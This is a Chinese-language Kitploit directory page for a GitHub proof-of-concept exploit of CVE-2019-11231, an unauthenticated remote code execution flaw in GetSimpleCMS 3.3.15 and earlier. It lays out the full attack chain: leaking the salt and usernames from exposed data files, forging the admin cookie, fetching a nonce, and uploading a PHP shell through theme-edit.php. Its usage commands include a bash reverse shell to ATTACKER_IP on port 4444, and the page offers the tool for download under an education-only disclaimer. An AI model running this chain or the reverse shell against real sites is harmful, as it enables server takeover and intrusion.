Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-11231-PoC — CVE-2019-11231 PoC | Kitploit
工具/GitHubGitHub/akincibor/cve-2019-11231-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

CVE-2019-11231 PoC

查看仓库
18个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

GetSimpleCMS CVE-2019-11231 RCE 漏洞利用

Python CVE

针对 GetSimpleCMS ≤ 3.3.15 的未认证远程代码执行漏洞利用

漏洞

GetSimpleCMS 会公开暴露敏感文件(/data/other/authorization.xml、/data/users/),攻击者可以:

  1. 泄漏 API 密钥和用户名
  2. 伪造认证 Cookie
  3. 获取 CSRF 令牌
  4. 上传并执行任意 PHP 代码

CVSS 评分: 9.8(严重)

使用方法

root@kitploit:~
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

工作原理

  1. 枚举版本 → GET /admin/
  2. 泄漏盐值 → GET /data/other/authorization.xml
  3. 获取用户名 → GET /data/users/
  4. 伪造 Cookie → SHA1(username + salt)
  5. 获取 nonce → GET /admin/theme-edit.php
  6. 上传 Shell → POST /admin/theme-edit.php
  7. 执行命令 → GET /theme/shell.php?cmd=...

文件

  • exploit.py - 主漏洞利用脚本
  • requirements.txt - 依赖项(requests、beautifulsoup4)

免责声明

⚠️ 仅供教育用途。 仅可在你自己拥有或已获授权的系统上进行测试。

参考

  • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231
下载工具